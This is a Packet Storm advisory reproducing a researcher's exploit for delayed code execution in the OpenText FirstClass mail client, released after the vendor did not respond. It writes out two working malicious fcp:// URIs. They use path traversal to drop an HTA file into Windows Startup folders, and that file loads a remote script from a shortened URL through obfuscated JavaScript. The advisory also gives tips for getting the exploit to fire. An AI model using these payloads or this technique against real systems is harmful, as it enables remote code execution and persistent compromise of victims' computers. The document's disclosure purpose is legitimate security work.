OpenText First Class Client 11.005 Code Execution

2011-04-12T00:00:00
ID PACKETSTORM:100317
Type packetstorm
Reporter Kyle Ossinger
Modified 2011-04-12T00:00:00

Description

                                        
                                            `# Exploit Title: OpenText FirstClass Client (Delayed) Code Executiion  
# Date: Discovered 11/16/2010, Contacted OpenText 2/1/11 and 2/7/11, Released 4/11/2011  
# Author: Kyle Ossinger (www.k0ss.net)  
# Email: security@k0ss.net  
# Software Link: http://www3.firstclass.com/ClientDownloads/FC11ClientDownloadFiles/FC11005US.exe  
# Version: v.11 and lower, but will probably work on newer versions once they are released  
# Tested on: Windows XP, Vista, 7  
# CVE : none, no response from MITRE about this  
  
DISCLAIMER  
--------------------  
I contacted OpenText about this issue twice over the period of a few  
weeks and they never responded. This is why I'm releasing the exploit  
now; so it has a better chance of being patched.  
I take no responsibility for how anyone uses the following  
information. I only hope this helps the exploit developers think  
outside the box of overflow exploits in executable programs. Any  
testing of the following information should be used in an isolated  
network using a FirstClass server that you own and operate or have  
permission to try this out on.  
  
  
ABOUT  
-----------  
This is an implementation flaw, not your usual buffer overflow/heap  
overflow/format string exploit.  
By getting a victim to click on a specially crafted link in the  
FirstClass mail client, an attacker can place an executable file on  
the victim's computer which will be executed upon the next system  
reboot.  
  
The way it works is that you can make a URI to create a settings file  
for the user to use, by crafting it as such:  
fcp://username:password(optional)@servername.tld;settingsfilename.fc  
  
Whatever you put into username and servername gets put into the  
settings file as plain-text, so that is how I inject some code. You  
normally can't change the file extension though (seen at the end of  
the URI), but after a lot of tinkering I found that if you make the  
URI try to access a path inside of the firstclass server, you (for  
some reason) CAN change the file extension. Since I had to inject  
some commands into this file to make it execute code, but it is  
surrounded by junk characters that would break any compiled executable  
or even batch scripts, I knew I'd have to use an HTML Application  
(HTA) file, which does indeed work wonderfully.  
  
  
THE EXPLOIT URI  
---------------------------  
The following URI will add the executable file to the startup programs  
directory of every user on the computer, given that the current user  
has write access to the All Users directory on windows. An attacker  
would only use this if he or she were certain that the victim user is  
an Administrator on his or her computer.  
  
fcp://<hta><script src='is.gd/9JR6g0' id="s"></script>@<body  
onload=(s.src="http"%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2BString.fromCharCode(47)%2Bs.src)>/j;%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cAll%20Users%5cStart%20Menu%5cPrograms%5cStartup%5ca%2ehta  
  
The following URI will add that same executable file to the CURRENT  
USER's startup programs directory, but maybe afterwards the attacker  
could launch some privilege escalation exploits to get the desired  
access.  
  
fcp://<hta><script src='is.gd/9JR6g0' id="s"></script>@<body  
onload=(s.src="http"%2bString.fromCharCode(58)%2bString.fromCharCode(47)%2BString.fromCharCode(47)%2Bs.src)>/j;%2e%2e%5c%2e%2e%5c%2e%2e%5cStart%20Menu%5cPrograms%5cStartup%5ca%2ehta  
  
If you want to understand more of how this exploit works please check  
out www.k0ss.net, but if you just want to know the basic idea of how  
it works these basics will have to suffice.  
The <script src=> needs to point to your javascript file which uses  
only javascript that WSH can understand. Also, the URL pointing to  
your script file must be made into a small URL in order to fit size  
constraints. Make sure to strip off the "http://" part from the  
script URL as well, as it would break the exploit.  
  
  
NOTE: The URI can be a bit finicky when trying to put it into a  
bookmark/link on FirstClass. It usually adds 2 random CRLF  
characters, and gets rid of the 'a' in "hta". You can correct this  
and hit Ok again, and it will look normal again and work. It's just  
something to check if it isn't working on your test machine.  
  
A complete write-up on how this particular exploit works can be viewed  
at www.k0ss.net  
  
`